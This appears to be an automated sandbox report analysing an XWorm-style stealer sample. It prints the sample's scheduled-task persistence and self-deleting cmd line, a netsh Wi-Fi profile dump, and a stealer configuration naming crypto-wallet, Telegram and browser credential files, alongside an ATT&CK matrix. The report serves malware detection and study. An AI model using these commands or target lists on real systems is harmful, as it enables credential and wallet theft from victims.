                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "ffmaba" /sc minute /tr "c:\users\user\appdata\local\starlabs\ffmaba.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\ffmaba.exe" &&start "" "c:\users\user\appdata\local\starlabs\ffmaba.exe"
                Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managert-cq
                Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: @\cq@\cq'PING!<Xwormmm>Program Manager<Xwormmm>0
                Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $cq'PING!<Xwormmm>Program Manager<Xwormmm>0Tecq
                Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $cq'PING!<Xwormmm>Program Manager<Xwormmm>0TecqxF
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Queries volume information: C:\Users\user\Desktop\yt7dW9nyJK.exe VolumeInformation
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ffmaba.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Queries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe Queries volume information: C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt VolumeInformation
                Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe Code function: 25_2_6C092808 GetSystemTime,SystemTimeToFileTime,BIO_ctrl,25_2_6C092808
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe Code function: 25_2_6C1BA406 DeregisterEventSource,GetVersion,25_2_6C1BA406
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Lowering of HIPS / PFW / Operating System Security Settings

                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                Source: yt7dW9nyJK.exe, 00000004.00000002.4535482777.0000000005EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR
                Source: Yara match File source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.yt7dW9nyJK.exe.261d0c0.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.yt7dW9nyJK.exe.26309a0.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: yt7dW9nyJK.exe PID: 5576, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: yt7dW9nyJK.exe PID: 2672, type: MEMORYSTR
                Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command 
name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                Source: tor-real.exe, 00000019.00000003.2480126236.0000000000F99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: electroncash
                Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 2iKqyuJTFpsXTtRw9pc8q8E38SzLcjAXXgfpuQw9044ON7ezDFP6911LpNxsu4gO2M2bDuH7YEkdMGBKv
                Source: ffmaba.exe, 00000013.00000002.4510696537.00000000030E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $cq%AppData%`,cqdC:\Users\user\AppData\Roaming`,cqdC:\Users\user\AppData\Roaming\Binance
                Source: powershell.exe, 00000006.00000002.2116961691.0000000007BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
                Source: ffmaba.exe, 00000013.00000002.4510696537.00000000030E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $cq%AppData%`,cqdC:\Users\user\AppData\Roaming`,cqdC:\Users\user\AppData\Roaming\ledger live
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: Yara match File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR
                Source: Yara match File source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.yt7dW9nyJK.exe.261d0c0.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.yt7dW9nyJK.exe.26309a0.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: yt7dW9nyJK.exe PID: 5576, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: yt7dW9nyJK.exe PID: 2672, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe Code function: 25_2_6C1B0CB0 BIO_bind,bind,ERR_put_error,WSAGetLastError,ERR_put_error,ERR_put_error,25_2_6C1B0CB0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe Code function: 25_2_6C1B0DA0 BIO_listen,getsockopt,WSAGetLastError,ERR_put_error,ERR_put_error,BIO_socket_nbio,setsockopt,BIO_ADDR_family,BIO_bind,ERR_put_error,listen,WSAGetLastError,ERR_put_error,ERR_put_error,setsockopt,WSAGetLastError,ERR_put_error,ERR_put_error,setsockopt,WSAGetLastError,ERR_put_error,ERR_put_error,WSAGetLastError,ERR_put_error,ERR_put_error,__stack_chk_fail,25_2_6C1B0DA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe Code function: 25_2_6C1B0F53 listen,WSAGetLastError,ERR_put_error,ERR_put_error,25_2_6C1B0F53
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 231 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 12 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 Scheduled Task/Job | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | Logon Script (Windows) | 1 Scheduled Task/Job | 31 Obfuscated Files or Information | Security Account Manager | 26 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 22 Software Packing | NTDS | 1 Query Registry | Distributed Component Object Model | Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 651 Security Software Discovery | SSH | Keylogging | 1 Multi-hop Proxy | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | 2 Non-Application Layer Protocol | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 161 Virtualization/Sandbox Evasion | DCSync | 161 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | 13 Application Layer Protocol | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | 2 Proxy | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                [Behavior graph. Behavior Graph ID: 1479415, Sample: yt7dW9nyJK.exe, Startdate: 23/07/2024, Architecture: WINDOWS, Score: 100]

